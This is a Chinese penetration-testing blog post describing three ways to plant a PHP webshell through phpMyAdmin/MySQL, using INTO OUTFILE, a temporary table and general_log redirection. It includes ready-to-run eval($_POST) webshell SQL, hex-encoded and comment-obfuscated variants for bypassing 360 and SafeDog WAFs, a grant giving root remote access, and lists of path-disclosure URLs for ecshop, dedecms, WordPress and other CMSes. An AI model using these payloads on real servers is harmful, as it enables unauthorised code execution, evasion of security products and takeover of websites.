web渗透【11】phpmyadmin写shell的三种方法

最新推荐文章于 2024-04-30 13:26:17 发布
最新推荐文章于 2024-04-30 13:26:17 发布
阅读量5.9k 收藏 26
点赞数 6
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/106440534
版权

查看phpMyAdmin能否自定义导出文件目录的权限

 show global variables like "%secure%";      //查询secure_file_priv配置

  1.     secure_file_prive=null                //不允许导入导出数据到目录
  2.     secure_file_priv=c:\\www           //允许导入导出数据到指定目录
  3.     secure_file_priv=''                      //允许导入导出数据到任意目录
  4.     secure_file_priv="/"                   //允许导入导出数据到任意目录

注:在my.ini、my.cnf、mysqld.cnf文件中找到secure_file_prive并将其值设置为""或"/",重启MySQL服务!

(1)情况一:

导出WebShell主要条件:

1.Root数据库用户(root权限)

2.网站绝对路径(确定有写入权限)

3.magic_quotes_gpc:Off(关闭)

一句话导出shell:
select '<?php @eval($_POST[x123]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';

(2)情况二:

1.Root数据库用户(root权限)

2.网站绝对路径(确定有写入权限)

3.magic_quotes_gpc:Off(开启)

创建数据表导出shell
CREATE TABLE `mysql`.`user1` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`user1` (`content` ) VALUES ('<?php @eval($_POST[x123]);?>');
SELECT `content` FROM `user1` INTO OUTFILE 'C:\\phpStudy\\WWW\\xxx.php';
DROP TABLE IF EXISTS `user1`;

(3)情况三:(日志备份获取shell)

1.Root数据库用户(root权限)

2.没有写入权限

3.magic_quotes_gpc:Off(关闭)

show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='D:/phpStudy/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

1、执行第一步后,记住原始的log_file路径,便于以后还原 

2、执行第二,三后,再用show global variables llike "%genera" 查看更改结果; 

3、然后进行写php,关闭日志,OK。访问可以看到php被执行。

补充一:

当有WAF拦截的时候 我们可以尝试外链 这样提交的数据包不被WAF拦截

grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;     //开启MySQL外链
flush privileges;                      //刷新MySQL系统权限相关表

这里的这些技巧是从别人那边收集过来的 感谢!!!

绕过360 (通过内联注释)
select '<?php @eval($_POST[pass]);?>' into /*!50001outfile*/ 'c:/phpstudy/www/bypass.php';

绕过网站安全狗<4.0 (通过hex编码)

select 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

绕过安全狗4.0 通过hex编码+内联注释

/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

绕过server_sql.php、tbl_sql.php、db_sql.php + 安全狗导出WebShell
以上的三个文件的作用是(执行SQL语句)
但是如果被删除了可以通过以下的方法

(1)token需要
(2)自己选择一个数据库和数据表
(3)参数pos=0
&sql_query=/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';


例如 http://127.0.0.1/phpmyadmin/sql.php?db=数据库名&token=token值&table=数据表名&pos=0&sql_query=/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';


————————————————

补充二:

找绝对路劲:

php爆路径方法收集 :

1、单引号爆路径

说明:

直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。

www.xxx.com/news.php?id=149′

2、错误参数值爆路径

说明:

将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。

www.xxx.com/researcharchive.php?id=-1

3、Google爆路径

说明:

结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。

Site:xxx.edu.tw warning

Site:xxx.com.tw “fatal error”

4、测试文件爆路径

说明:

很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5、phpmyadmin爆路径

说明:

一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫,也可以选择google。PS:有些BT网站会写成phpMyAdmin。

1. /phpmyadmin/libraries/lect_lang.lib.php

2./phpMyAdmin/index.php?lang[]=1

3. /phpMyAdmin/phpinfo.php

4. load_file()

5./phpmyadmin/themes/darkblue_orange/layout.inc.php

6./phpmyadmin/libraries/select_lang.lib.php

7./phpmyadmin/libraries/lect_lang.lib.php

8./phpmyadmin/libraries/mcrypt.lib.php

6、配置文件找路径

说明:

如果注入点有文件读取权限,就可以手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。

Windows:

c:\windows\php.ini                                    php配置文件

c:\windows\system32\inetsrv\MetaBase.xml              IIS虚拟主机配置文件

Linux:

/etc/php.ini                                           php配置文件

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf                             Apache配置文件

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf         虚拟目录配置文件

7、nginx文件类型错误解析爆路径

说明:

这是昨天无意中发现的方法,当然要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。

www.xxx.com/top.jpg/x.php

8、其他

dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

WP

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

ecshop商城系统暴路径漏洞文件

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

ucenter爆路径

ucenter\control\admin\db.php

DZbbs

manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog

admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168爆路径

admin/inc/hack/count.php?job=list

admin/inc/hack/search.php?job=getcode

admin/inc/ajax/bencandy.php?job=do

cache/MysqlTime.txt

PHPcms2008-sp4

注册用户登陆后访问

phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog

PoC:

/go.php/<[evil code]

CMSeasy爆网站路径漏洞

漏洞出现在menu_top.php这个文件中

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php

 

司徒荆
关注
  • 6
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpMyAdmin(mysql)常见的shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7926
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件 shell 5.通过慢查询shell 6.创建数据库和表入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
phpMyadminshell
wangyanjienice的博客
04-07 888
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法
PhpAdmin-getshell
A345545108的博客
04-30 634
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。路径:C:\phpstudy_pro\Extensions\MySQL5.7.26\。value可也已设置为其他路径。
sql注入和phpmyadmin日志入webshell
weixin_54813510的博客
05-25 1668
入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
phpmyadmin入webshell
Kris__zhang的博客
03-15 1519
获取MySQL密码的方法 1、源代码泄露 2、暴力破解mysql 3、爆破出的phpmyadmin未授权访问漏洞 4、通过文件包含漏洞读取配置文件中的数据库账号密码 5、其他方式获取 暴力破解工具下载地址:https://wws.lanzous.com/i3iOTmyfhxg 密码:3uk5 我们成功的获取到mysql的账号密码,登录到phpmyadmin管理界面之后,可通过以下方式入webshell。 select … . into outfile 语句直接入webshell 必需满足的条件 root
phpmyadmin通过日志shell
m0_53087192的博客
01-07 906
1.查看general log是否开启 show variables like ‘%general%’; 打开general_log日志读功能 SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’; 查看绝对路径(探针等) shell,会把执行的语句shell.php,然后我们查询一下 SET GLOBAL general_log_file=‘C://phpStudy//PHPTutorial//WWW//shel
phpmyadmin常见getshell方法
Blue的博客
06-10 2474
1、利用条件2、如果满足以上条件可以直接shell在实际webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
phpMyAdmin无法登陆的解决方法
12-20
今天安装上phpStudy,默认mysql的密码为空,登陆phpMyAdmin报如下的错误: ①打开phpStudy的mysql控制台,提示输入密码,开始密码为空,直接按回车 ②输入【use mysql】,控制台提示【Database changed】 ③输入...
phpmyadmin MySQL 加密配置方法
01-21
以版本phpMyAdmin-2.6.1.tar.gz为例 先解压phpMyAdmin-2.6.1.tar.gz到/usr/local/apache2/htdocs, 得到文件夹phpMyAdmin-2.6.1,将其重命名为phpmyadmin,(这样在以后的操作中将会变的简便)。 进入到phpmyadmin...
phpmyadmin:MySQL和MariaDB的Web界面
02-03
**phpMyAdmin:MySQL与MariaDB的Web管理界面** phpMyAdmin是一款强大的开源软件,它为MySQL和MariaDB数据库提供了一个直观且易于使用的Web界面。这个工具使得数据库管理任务变得简单,无需通过命令行或者编复杂的...
虚拟主机中phpMyAdmin的安装配置方法
12-15
标题所述的"虚拟主机中phpMyAdmin的安装配置方法"是一个关于如何在虚拟服务器上部署和配置PHPMyAdmin的教程。PHPMyAdmin是一款基于Web的MySQL数据库管理工具,它允许用户通过浏览器界面轻松地创建、修改和管理数据库...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
【WEB安全】PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4730
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出入利用条件利用方式数据库全局日志入利用条件利用方式数据库慢查询日志入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 3740
前言: phpmyadmin后台拿webshell方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件入一句话来获取webshell: (1) 、首先我们先利用日志文件入一句话来获取webshell,日志文件入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
phpmyadmin登录后台后利用日志或file_into入webshell
不想当脚本小子的脚本小子
01-15 552
必须为root权限并且已知网站路径: 在后台管理界面中,将general log改为ON ,general log file另存为网站目录下(webshell必须入到网站目录下) 再利用sql语句入用菜刀连接即可
webshell php 教程,技术分享丨phpMyAdmin 常见入webshell方法(二)
weixin_39844963的博客
03-17 182
六.CVE-2018-19968 phpmyadmin文件包含getshell环境搭建:在线环境VulnSpy已为大家提供在线phpMyAdmin环境地址:https : //www.vsplate.com/?github = vulnspy/phpmyadmin-4.8.1,单击又上角的START TO HACK按钮可进行在线测试。也可以选择自行到phpmyadmin官网下载对应版本。利用条件...
php admin_priv,一次phpmyadmin突破secure_file_privshell 的渗透
weixin_39664560的博客
03-13 207
晚上下闲来无事,租的公寓一共两间房,我和另外一个同学各住一间,隔壁一墙之隔的他正在打游戏,我比较爱学习,随便玩玩,就突然引发了一次简单渗透。。。 无关紧要的过程就不了,下面简单记录下主要有用的步骤。首先nmap扫描内网发现发现内网里面存活的主机,不多,简单排除下,估计192.168.1.101就是隔壁室友的电脑了,发现80、3306端口图片.png访问下80,如下图,最近在做毕业设计,很明显这是...
phpmyadmin getshell
YouthBelief的博客
11-11 4959
phpmyadmin getshell前言一、into outfile马条件利用方法操作二、开启日志马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile马 条件 1.对web目录需要有权限能
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值